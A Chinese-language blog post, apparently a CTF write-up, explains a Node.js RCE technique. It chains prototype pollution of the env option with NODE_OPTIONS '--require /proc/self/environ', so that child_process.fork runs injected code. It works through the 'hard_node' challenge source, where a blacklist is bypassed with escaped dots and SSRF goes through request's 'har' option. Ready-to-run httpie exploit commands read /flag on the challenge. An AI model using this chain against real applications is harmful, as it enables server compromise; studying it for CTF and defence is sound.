Skip to content

Node.js child_process.fork 与 env 污染 RCE

Published: at 23:52

Node 从8.0 开始支持 NODE_OPTIONS,而 Node 的参数中有一项名为 --require,可以加载执行一段 JavaScript 代码。这就是一切的起源。

ToC

当 NODE_OPTIONS 遇到 fork

我们先来看一下 child_process.fork 的源码:

function fork(modulePath /* , args, options */) {
validateString(modulePath, "modulePath");
// Get options and args arguments.
let execArgv;
let options = {};
let args = [];
let pos = 1;
if (pos < arguments.length && ArrayIsArray(arguments[pos])) {
args = arguments[pos++];
}
if (
pos < arguments.length &&
(arguments[pos] === undefined || arguments[pos] === null)
) {
pos++;
}
if (pos < arguments.length && arguments[pos] != null) {
if (typeof arguments[pos] !== "object") {
throw new ERR_INVALID_ARG_VALUE(`arguments[${pos}]`, arguments[pos]);
}
options = { ...arguments[pos++] };
}
// Prepare arguments for fork:
execArgv = options.execArgv || process.execArgv;
if (execArgv === process.execArgv && process._eval != null) {
const index = execArgv.lastIndexOf(process._eval);
if (index > 0) {
// Remove the -e switch to avoid fork bombing ourselves.
execArgv = execArgv.slice();
execArgv.splice(index - 1, 2);
}
}
args = execArgv.concat([modulePath], args);
if (typeof options.stdio === "string") {
options.stdio = stdioStringToArray(options.stdio, "ipc");
} else if (!ArrayIsArray(options.stdio)) {
// Use a separate fd=3 for the IPC channel. Inherit stdin, stdout,
// and stderr from the parent if silent isn't set.
options.stdio = stdioStringToArray(
options.silent ? "pipe" : "inherit",
"ipc"
);
} else if (!options.stdio.includes("ipc")) {
throw new ERR_CHILD_PROCESS_IPC_REQUIRED("options.stdio");
}
options.execPath = options.execPath || process.execPath;
options.shell = false;
return spawn(options.execPath, args, options);
}

看到第 52 行。当 options 中没有 execPath 中,fork 会尝试使用 process.execPath,也就是 node 本身。如果我们还可以控制 options.env,那就可以在 fork 执行之前先执行一段我们想要执行的代码。

原型链注入

原型链注入是老生长谈的 Node 安全漏洞了。这次,我们需要通过它写入 env,以在 fork 时传入环境变量。

通过注入 __proto__.env,向其中写入:

{
"NODE_OPTIONS": "--require path/to/file.js"
}

我们就可以执行对应的 JavaScript 了。那如果不能借助文件,我们又该怎么办呢?

/proc

通过 /proc/self/environ,我们可以读取当前的环境变量。于是,我们就可以通过将代码写到环境变量里,达到执行任意代码的目的。我们将上面的 payload 修改成下面的形式:

{
"AAAA": "console.log("2333")//",
"NODE_OPTIONS": "--require /proc/self/environ"
}

就可以在 fork 之前向控制台打印出 2333 了。这里的 AAAA 是为了让这条环境变量在 /proc/self/environ 中能显示在最前,而后面的 // 则是为了注释掉之后的内容,防止执行出现问题。AAAA// 的配合使得只有我们希望的代码被执行,提高了破坏力。

实战

这题据 CTFHub 说是 2020 第五空间决赛的 Web 题,名字是 hard_node,在 CTFHub 上可以找到。但 CTFHub 上没给源码,所以这里附一下源码。

app.js
const express = require("express");
const bodyParser = require("body-parser");
const proc = require("child_process");
const request = require("request");
const ip = require("ip");
const manage = require("./manage.js");
const path = require("path");
const app = express();
app.use(bodyParser.urlencoded({ extended: true }));
app.use(bodyParser.json());
app.use(express.static(path.join(__dirname, "public")));
//stop hackers
const disallowedKeys = [
"__proto__",
"prototype",
"constructor",
"eval",
"proccess",
"root",
"global",
"exec",
"!",
"fs",
];
function isValidPath(segment) {
disallowedKeys.forEach(evilWord => {
if (segment.toString().indexOf(evilWord) !== -1) {
return false;
}
});
return true;
}
app.post("/add", (req, res) => {
let ip = req.ip;
console.log(ip.m);
if (ip.substr(0, 7) == "::ffff:") {
ip = ip.substr(7);
}
console.log(`method:${req.method},serverip:${server_ip},ip:${ip}`);
if (ip != "127.0.0.1" && ip != server_ip) {
res.status(403).send("Not Edit from Local!");
} else {
if (req.body.userName && req.body.nameVal) {
let username = req.body.userName;
let nameVal = req.body.nameVal;
if (!isValidPath(username) || !isValidPath(nameVal)) {
username = "username";
nameVal = "guest";
}
manage.set(object, username, nameVal);
console.log(ip.k);
console.log(object);
res.send(`
<h1>Edit Success</h1>
<a href="/admin">View Admin Page</a>`);
} else {
res.send("param error");
}
}
});
app.get("/admin", (req, res) => {
if (manage.get(object, "username", "guest") === "admin") {
console.log("Current User:" + object.username);
const child = proc.fork(`${__dirname}/public/user.js`, ["admin"]);
child.on("message", body => {
res.status(200).send(body);
});
child.on("close", (code, signal) => {
console.log(`subproccess ended with ${signal}`);
});
} else {
res.status(403).send("Only Admin Can View this");
}
});
app.get("/getContent", (req, res) => {
res.sendfile(`${__dirname}/public/guest.html`);
});
app.get("/", (req, res) => {
// console.log(req.body)
let uri = req.query.url ? req.query.url : "http://127.0.0.1:3000/getContent";
console.log(uri);
try {
request.get(uri, (err, response, data) => {
if (!err && response.statusCode == 200) {
res.send(data);
} else {
console.log(err);
}
});
} catch (e) {
console.log(e);
} finally {
console.log("Make Server Continue Running");
}
});
var object = { username: "guest" };
var server_ip = ip.address();
app.listen(3002);
console.log(`${server_ip} is starting at port 3000`);
manage.js
const isObj = require("is-obj");
var manage = {
getPathSegments: function (path) {
const pathArray = path.split(".");
const parts = [];
for (let i = 0; i < pathArray.length; i++) {
let p = pathArray[i];
while (p[p.length - 1] === "\\" && pathArray[i + 1] !== undefined) {
p = p.slice(0, -1);
p += pathArray[++i];
}
parts.push(p);
}
return parts;
},
get: function (object, path, value) {
if (!isObj(object) || typeof path !== "string") {
return value === undefined ? object : value;
}
const pathArray = this.getPathSegments(path);
for (let i = 0; i < pathArray.length; i++) {
if (!Object.prototype.propertyIsEnumerable.call(object, pathArray[i])) {
return value;
}
object = object[pathArray[i]];
if (object === undefined || object === null) {
if (i !== pathArray.length - 1) {
return value;
}
break;
}
}
return object;
},
set: function (object, path, value) {
Object.keys(Object.prototype).forEach(function (Val) {
if (!Object.hasOwnProperty(Val)) {
delete Object.prototype[Val];
console.log(`${Val} is delete`);
}
});
if (!isObj(object) || typeof path !== "string") {
return object;
}
const root = object;
const pathArray = this.getPathSegments(path);
for (let i = 0; i < pathArray.length; i++) {
const p = pathArray[i];
if (!isObj(object[p])) {
object[p] = {};
}
if (i === pathArray.length - 1) {
object[p] = value;
}
object = object[p];
}
return root;
},
};
module.exports = manage;

可以看到,manager.jsset 存在明显的原型链注入,而通过 getPathSegments 又可以以 \\. 的方式绕过黑名单的检测。

我们发现,修改信息只能通过 /add 进行,这里有一个内网限定访问,可以使用 requesthar 来实现:

Terminal window
http --follow --timeout 3600 GET challenge-9a9f71099ac1a765.sandbox.ctfhub.com:10080/ 'url[har][method]'=='POST' 'url[har][url]'=='http://127.0.0.1/add' 'url[har][postData][text]'=='{"userName": "username", "nameVal": "admin"}' 'url[har][postData][mimeType]'=='application/json'

然后执行写入要执行的代码:

Terminal window
http --follow --timeout 3600 GET challenge-9a9f71099ac1a765.sandbox.ctfhub.com:10080/ 'url[har][method]'=='POST' 'url[har][url]'=='http://127.0.0.1/add' 'url[har][postData][text]'=='{"userName": "__pr\\\\.oto__.env", "nameVal": {"A": "process.send(require('\''child_process'\'').execSync('\''cat /flag'\''))//", "NODE_OPTIONS": "--require /proc/self/environ"}}' 'url[har][postData][mimeType]'=='application/json'

最后访问 /admin 就可以了。

(最后从 CTFHub 上把源码偷下来了:https://drive.google.com/file/d/1z6zT48OI7zeUjWwIJvma66_2ZGIMz1M2/view?usp=sharing

参考

  1. https://xz.aliyun.com/t/6755
  2. https://blog.szfszf.top/article/47/
  3. https://github.com/mpgn/CVE-2019-7609

Previous Post
EP.01 「夜の向日葵」
Next Post
[微机实验/TD-PITE] 8251 串行接口实验